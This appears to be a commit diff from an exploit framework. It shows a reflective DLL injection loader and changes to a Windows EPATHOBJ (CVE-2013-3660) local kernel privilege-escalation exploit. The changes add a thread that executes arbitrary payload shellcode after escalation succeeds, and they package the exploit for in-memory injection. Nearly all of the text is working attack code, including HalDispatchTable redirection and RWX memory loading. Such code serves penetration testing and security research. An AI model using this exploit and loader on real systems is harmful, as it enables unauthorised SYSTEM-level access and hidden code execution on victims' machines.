// compute the hash values for this function name
dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
// if we have found a function we want we get its virtual address
if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
{
// get the VA for the array of addresses
uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use this functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// store this functions VA
if( dwHashValue == LOADLIBRARYA_HASH )
pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == GETPROCADDRESS_HASH )
pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == VIRTUALALLOC_HASH )
pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
// decrement our counter
usCounter--;
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
}
else if( (DWORD)uiValueC == NTDLLDLL_HASH )
{
// get this modules base address
uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
// get the VA of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of name pointers
uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
// get the VA for the array of name ordinals
uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
usCounter = 1;
// loop while we still have imports to find
while( usCounter > 0 )
{
// compute the hash values for this function name
dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
// if we have found a function we want we get its virtual address
if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
{
// get the VA for the array of addresses
uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use this functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// store this functions VA
if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)( uiBaseAddress + DEREF_32( uiAddressArray ) );
// decrement our counter
usCounter--;
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
}
// we stop searching when we have found everything we need.
if( pLoadLibraryA && pGetProcAddress && pVirtualAlloc && pNtFlushInstructionCache )
break;
// get the next entry
uiValueA = DEREF( uiValueA );
}
// STEP 2: load our image into a new permanent location in memory...
// get the VA of the NT Header for the PE to be loaded
uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// allocate all the memory for the DLL to be loaded into. we can load at any address because we will
// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
uiBaseAddress = (ULONG_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
// we must now copy over the headers
uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
uiValueB = uiLibraryAddress;
uiValueC = uiBaseAddress;
while( uiValueA-- )
*(BYTE *)uiValueC++ = *(BYTE *)uiValueB++;
// STEP 3: load in all of our sections...
// uiValueA = the VA of the first section
uiValueA = ( (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
// itterate through all sections, loading them into memory.
uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections;
while( uiValueE-- )
{
// uiValueB is the VA for this section
uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
// uiValueC if the VA for this sections data
uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
// copy the section over
uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
while( uiValueD-- )
*(BYTE *)uiValueB++ = *(BYTE *)uiValueC++;
// get the VA of the next section
uiValueA += sizeof( IMAGE_SECTION_HEADER );
}
// STEP 4: process our images import table...
// uiValueB = the address of the import directory
uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
// we assume their is an import table to process
// uiValueC is the first entry in the import table
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// itterate through all imports
while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
{
// use LoadLibraryA to load the imported module into memory
uiLibraryAddress = (ULONG_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
// uiValueD = VA of the OriginalFirstThunk
uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
// itterate through all imported functions, importing by ordinal if no name present
while( DEREF(uiValueA) )
{
// sanity check uiValueD as some compilers only import by FirstThunk
if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
{
// get the VA of the modules NT Header
uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of addresses
uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use the import ordinal (- export ordinal base) as an index into the array of addresses
uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
// patch in the address for this imported function
DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
}
else
{
// get the VA of this functions import by name struct
uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
// use GetProcAddress and patch in the address for this imported function
DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
}
// get the next imported function
uiValueA += sizeof( ULONG_PTR );
if( uiValueD )
uiValueD += sizeof( ULONG_PTR );
}
// get the next import
uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
}
// STEP 5: process all of our images relocations...
// calculate the base address delta and perform relocations (even if we load at desired image base)
uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
// uiValueB = the address of the relocation directory
uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
// check if their are any relocations present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// and we itterate through all entries...
while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
{
// uiValueA = the VA for this relocation block
uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
// uiValueB = number of entries in this relocation block
uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
// uiValueD is now the first entry in the current relocation block
uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
// we itterate through all the entries in the current block...
while( uiValueB-- )
{
// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
// we dont use a switch statement to avoid the compiler building a jump table
// which would not be very position independent!
if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
*(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
#ifdef WIN_ARM
// Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem.
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T )
{
register DWORD dwInstruction;
register DWORD dwAddress;
register WORD wImm;
// get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word)
dwInstruction = *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) );
// flip the words to get the instruction as expected
dwInstruction = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
// sanity chack we are processing a MOV instruction...
if( (dwInstruction & ARM_MOV_MASK) == ARM_MOVT )
{
// pull out the encoded 16bit value (the high portion of the address-to-relocate)
wImm = (WORD)( dwInstruction & 0x000000FF);
wImm |= (WORD)((dwInstruction & 0x00007000) >> 4);
wImm |= (WORD)((dwInstruction & 0x04000000) >> 15);
wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4);
// apply the relocation to the target address
dwAddress = ( (WORD)HIWORD(uiLibraryAddress) + wImm ) & 0xFFFF;
// now create a new instruction with the same opcode and register param.
dwInstruction = (DWORD)( dwInstruction & ARM_MOV_MASK2 );
// patch in the relocated address...
dwInstruction |= (DWORD)(dwAddress & 0x00FF);
dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4;
dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15;
dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4;
// now flip the instructions words and patch back into the code...
*(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ) = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
}
}
#endif
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
// get the next entry in the current relocation block
uiValueD += sizeof( IMAGE_RELOC );
}
// get the next entry in the relocation directory
uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
}
}
// STEP 6: call our images entry point
// uiValueA = the VA of our newly loaded DLL/EXE's entry point
uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
// We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing.
pNtFlushInstructionCache( (HANDLE)-1, NULL, 0 );
// call our respective entry point, fudging our hInstance value
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
#else
// if we are injecting an DLL via a stub we call DllMain with no parameter
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
#endif
// STEP 8: return our new entry point address so whatever called us can call DllMain() if needed.
return uiValueA;
}
//===============================================================================================//
#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
{
BOOL bReturnValue = TRUE;
switch( dwReason )
{
case DLL_QUERY_HMODULE:
if( lpReserved != NULL )
*(HMODULE *)lpReserved = hAppInstance;
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}
#endif
//===============================================================================================//

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@ -1,202 +0,0 @@
//===============================================================================================//
// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
#define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <Winsock2.h>
#include <intrin.h>
#include "ReflectiveDLLInjection.h"
typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
typedef DWORD (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG );
#define KERNEL32DLL_HASH 0x6A4ABC5B
#define NTDLLDLL_HASH 0x3CFA685D
#define LOADLIBRARYA_HASH 0xEC0E4E8E
#define GETPROCADDRESS_HASH 0x7C0DFCAA
#define VIRTUALALLOC_HASH 0x91AFCA54
#define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8
#define IMAGE_REL_BASED_ARM_MOV32A 5
#define IMAGE_REL_BASED_ARM_MOV32T 7
#define ARM_MOV_MASK (DWORD)(0xFBF08000)
#define ARM_MOV_MASK2 (DWORD)(0xFBF08F00)
#define ARM_MOVW 0xF2400000
#define ARM_MOVT 0xF2C00000
#define HASH_KEY 13
//===============================================================================================//
#pragma intrinsic( _rotr )
__forceinline DWORD ror( DWORD d )
{
return _rotr( d, HASH_KEY );
}
__forceinline DWORD hash( char * c )
{
register DWORD h = 0;
do
{
h = ror( h );
h += *c;
} while( *++c );
return h;
}
//===============================================================================================//
typedef struct _UNICODE_STR
{
USHORT Length;
USHORT MaximumLength;
PWSTR pBuffer;
} UNICODE_STR, *PUNICODE_STR;
// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
//__declspec( align(8) )
typedef struct _LDR_DATA_TABLE_ENTRY
{
//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STR FullDllName;
UNICODE_STR BaseDllName;
ULONG Flags;
SHORT LoadCount;
SHORT TlsIndex;
LIST_ENTRY HashTableEntry;
ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
// WinDbg> dt -v ntdll!_PEB_LDR_DATA
typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
{
DWORD dwLength;
DWORD dwInitialized;
LPVOID lpSsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
LPVOID lpEntryInProgress;
} PEB_LDR_DATA, * PPEB_LDR_DATA;
// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
{
struct _PEB_FREE_BLOCK * pNext;
DWORD dwSize;
} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
// struct _PEB is defined in Winternl.h but it is incomplete
// WinDbg> dt -v ntdll!_PEB
typedef struct __PEB // 65 elements, 0x210 bytes
{
BYTE bInheritedAddressSpace;
BYTE bReadImageFileExecOptions;
BYTE bBeingDebugged;
BYTE bSpareBool;
LPVOID lpMutant;
LPVOID lpImageBaseAddress;
PPEB_LDR_DATA pLdr;
LPVOID lpProcessParameters;
LPVOID lpSubSystemData;
LPVOID lpProcessHeap;
PRTL_CRITICAL_SECTION pFastPebLock;
LPVOID lpFastPebLockRoutine;
LPVOID lpFastPebUnlockRoutine;
DWORD dwEnvironmentUpdateCount;
LPVOID lpKernelCallbackTable;
DWORD dwSystemReserved;
DWORD dwAtlThunkSListPtr32;
PPEB_FREE_BLOCK pFreeList;
DWORD dwTlsExpansionCounter;
LPVOID lpTlsBitmap;
DWORD dwTlsBitmapBits[2];
LPVOID lpReadOnlySharedMemoryBase;
LPVOID lpReadOnlySharedMemoryHeap;
LPVOID lpReadOnlyStaticServerData;
LPVOID lpAnsiCodePageData;
LPVOID lpOemCodePageData;
LPVOID lpUnicodeCaseTableData;
DWORD dwNumberOfProcessors;
DWORD dwNtGlobalFlag;
LARGE_INTEGER liCriticalSectionTimeout;
DWORD dwHeapSegmentReserve;
DWORD dwHeapSegmentCommit;
DWORD dwHeapDeCommitTotalFreeThreshold;
DWORD dwHeapDeCommitFreeBlockThreshold;
DWORD dwNumberOfHeaps;
DWORD dwMaximumNumberOfHeaps;
LPVOID lpProcessHeaps;
LPVOID lpGdiSharedHandleTable;
LPVOID lpProcessStarterHelper;
DWORD dwGdiDCAttributeList;
LPVOID lpLoaderLock;
DWORD dwOSMajorVersion;
DWORD dwOSMinorVersion;
WORD wOSBuildNumber;
WORD wOSCSDVersion;
DWORD dwOSPlatformId;
DWORD dwImageSubsystem;
DWORD dwImageSubsystemMajorVersion;
DWORD dwImageSubsystemMinorVersion;
DWORD dwImageProcessAffinityMask;
DWORD dwGdiHandleBuffer[34];
LPVOID lpPostProcessInitRoutine;
LPVOID lpTlsExpansionBitmap;
DWORD dwTlsExpansionBitmapBits[32];
DWORD dwSessionId;
ULARGE_INTEGER liAppCompatFlags;
ULARGE_INTEGER liAppCompatFlagsUser;
LPVOID lppShimData;
LPVOID lpAppCompatInfo;
UNICODE_STR usCSDVersion;
LPVOID lpActivationContextData;
LPVOID lpProcessAssemblyStorageMap;
LPVOID lpSystemDefaultActivationContextData;
LPVOID lpSystemAssemblyStorageMap;
DWORD dwMinimumStackCommit;
} _PEB, * _PPEB;
typedef struct
{
WORD offset:12;
WORD type:4;
} IMAGE_RELOC, *PIMAGE_RELOC;
//===============================================================================================//
#endif
//===============================================================================================//

View File

@ -0,0 +1,18 @@
<?xml version="1.0" standalone="yes"?>
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<SolutionPath>.\ppr_flatten_rec.sln</SolutionPath>
</PropertyGroup>
<Target Name="all" DependsOnTargets="x86" />
<Target Name="x86">
<Message Text="Building CVE-2013-3660 ppr_flatten_rc x86 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
</Target>
<Target Name="x64">
<Message Text="ppr_flatten_rec is not supported in x64" />
</Target>
</Project>

View File

@ -0,0 +1,22 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ppr_flatten_rec", "ppr_flatten_rec\ppr_flatten_rec.vcxproj", "{942BF20A-E438-48B0-A614-A6E0CC2E94BD}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Debug|Win32.ActiveCfg = Debug|Win32
{942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Debug|Win32.Build.0 = Debug|Win32
{942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Release|Win32.ActiveCfg = Release|Win32
{942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Release|Win32.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

View File

@ -418,19 +418,10 @@
# define WIN32_NO_STATUS
#endif
#include <stdio.h>
#include <stdarg.h>
#include <stddef.h>
#include <windows.h>
#include <assert.h>
#ifdef WIN32_NO_STATUS
# undef WIN32_NO_STATUS
#endif
#include <ntstatus.h>
#pragma comment(lib, "gdi32")
#pragma comment(lib, "kernel32")
#pragma comment(lib, "user32")
#pragma comment(lib, "shell32")
#pragma comment(linker, "/SECTION:.text,ERW")
#ifndef PAGE_SIZE
@ -448,11 +439,6 @@ static ULONG ComplexPathNumRegion = 0;
static HANDLE Mutex;
static DWORD ComplexPathFinished = 0;
// Log levels.
typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;
BOOL LogMessage(LEVEL Level, PCHAR Format, ...);
// Copied from winddi.h from the DDK
#define PD_BEGINSUBPATH 0x00000001
#define PD_ENDSUBPATH 0x00000002
@ -509,21 +495,24 @@ ULONG HalQuerySystemInformation;
PULONG TargetPid;
PVOID *PsInitialSystemProcess;
VOID elevator_complex_path();
//#define DEBUGTRACE 1
//#define DEBUGTRACE 1
#ifdef DEBUGTRACE
#define dprintf(...) real_dprintf(__VA_ARGS__)
#else
#define dprintf(...) do{}while(0);
#endif
static void real_dprintf(char *format, ...) {
va_list args;
char buffer[1024];
va_start(args,format);
vsnprintf_s(buffer, sizeof(buffer), sizeof(buffer)-3, format,args);
strcat_s(buffer, sizeof(buffer), "\r\n");
OutputDebugStringA(buffer);
}
// Log levels.
typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;
#ifdef DEBUGTRACE
VOID LogMessage(LEVEL Level, PCHAR Format, ...);
#define dprintf(...) real_dprintf(__VA_ARGS__)
static void real_dprintf(char *format, ...) {
va_list args;
char buffer[1024];
va_start(args,format);
vsnprintf_s(buffer, sizeof(buffer), sizeof(buffer)-3, format,args);
strcat_s(buffer, sizeof(buffer), "\r\n");
OutputDebugStringA(buffer);
}
#else
#define dprintf(...)
#define LogMessage(...)
#endif

View File

@ -1,15 +1,15 @@
//===============================================================================================//
// This is a stub for the actuall functionality of the DLL.
// This is a stub for the actual functionality of the DLL.
//===============================================================================================//
// Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are
// defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own
// DllMain and use the LoadRemoteLibraryR() API to inject this DLL.
//===============================================================================================//
#include "ReflectiveLoader.h"
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
#include "ComplexPath.h"
// Purloined from ntstatus.h
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth
//
// --------------------------------------------------
// Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit
@ -550,7 +550,20 @@ VOID __declspec(naked) HalDispatchRedirect(VOID)
}
}
VOID elevator_complex_path()
/*!
* @brief Helper thread function which runs the given payload directly.
* @param lpPayload The payload shellcode to execute.
* @returns \c ERROR_SUCCESS
*/
DWORD WINAPI execute_payload(LPVOID lpPayload)
{
LogMessage(L_INFO, "[PPRFLATTENREC] Payload thread started.");
VOID(*lpCode)() = (VOID(*)())lpPayload;
lpCode();
return ERROR_SUCCESS;
}
VOID elevator_complex_path(LPVOID lpPayload)
{
HANDLE Thread;
HDC Device;
@ -566,6 +579,12 @@ VOID elevator_complex_path()
"\rWindows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit\n"
"\r------------------- taviso@cmpxchg8b.com, programmeboy@gmail.com ---\n"
"\n");
if (lpPayload == NULL) {
LogMessage(L_ERROR, "[PRFLATTENREC] payload argument not specified");
return;
}
NtQueryIntervalProfile = GetProcAddress(GetModuleHandle("ntdll"), "NtQueryIntervalProfile");
NtQuerySystemInformation = GetProcAddress(GetModuleHandle("ntdll"), "NtQuerySystemInformation");
Mutex = CreateMutex(NULL, FALSE, NULL);
@ -590,10 +609,10 @@ VOID elevator_complex_path()
// Lookup some system routines we require.
KernelHandle = LoadLibrary(ModuleInfo.Modules[0].FullPathName + ModuleInfo.Modules[0].OffsetToFileName);
HalDispatchTable = (ULONG) GetProcAddress(KernelHandle, "HalDispatchTable") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
PsInitialSystemProcess = (ULONG) GetProcAddress(KernelHandle, "PsInitialSystemProcess") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
PsReferencePrimaryToken = (ULONG) GetProcAddress(KernelHandle, "PsReferencePrimaryToken") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
PsLookupProcessByProcessId = (ULONG) GetProcAddress(KernelHandle, "PsLookupProcessByProcessId") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
HalDispatchTable = (PULONG)((ULONG) GetProcAddress(KernelHandle, "HalDispatchTable") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
PsInitialSystemProcess = (PVOID*)((ULONG) GetProcAddress(KernelHandle, "PsInitialSystemProcess") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
PsReferencePrimaryToken = (FARPROC)((ULONG) GetProcAddress(KernelHandle, "PsReferencePrimaryToken") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
PsLookupProcessByProcessId = (FARPROC)((ULONG) GetProcAddress(KernelHandle, "PsLookupProcessByProcessId") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
// Search for a ret instruction to install in the damaged HalDispatchTable.
HalQuerySystemInformation = (ULONG) memchr(KernelHandle, 0xC3, ModuleInfo.Modules[0].ImageSize)
@ -629,7 +648,7 @@ VOID elevator_complex_path()
// I need to map at least two pages to guarantee the whole structure is
// available.
while (!VirtualAlloc(*DispatchRedirect & ~(PAGE_SIZE - 1),
while (!VirtualAlloc((LPVOID)(*DispatchRedirect & ~(PAGE_SIZE - 1)),
PAGE_SIZE * 2,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE)) {
@ -740,7 +759,7 @@ VOID elevator_complex_path()
if (ComplexPathFinished) {
LogMessage(L_INFO, "Success...", ComplexPathFinished);
//ExitProcess(0);
CreateThread(0, 0, execute_payload, lpPayload, 0, NULL);
return;
}
@ -756,7 +775,8 @@ VOID elevator_complex_path()
}
// A quick logging routine for debug messages.
BOOL LogMessage(LEVEL Level, PCHAR Format, ...)
#ifdef DEBUGTRACE
VOID LogMessage(LEVEL Level, PCHAR Format, ...)
{
CHAR Buffer[1024] = {0};
va_list Args;
@ -774,28 +794,34 @@ BOOL LogMessage(LEVEL Level, PCHAR Format, ...)
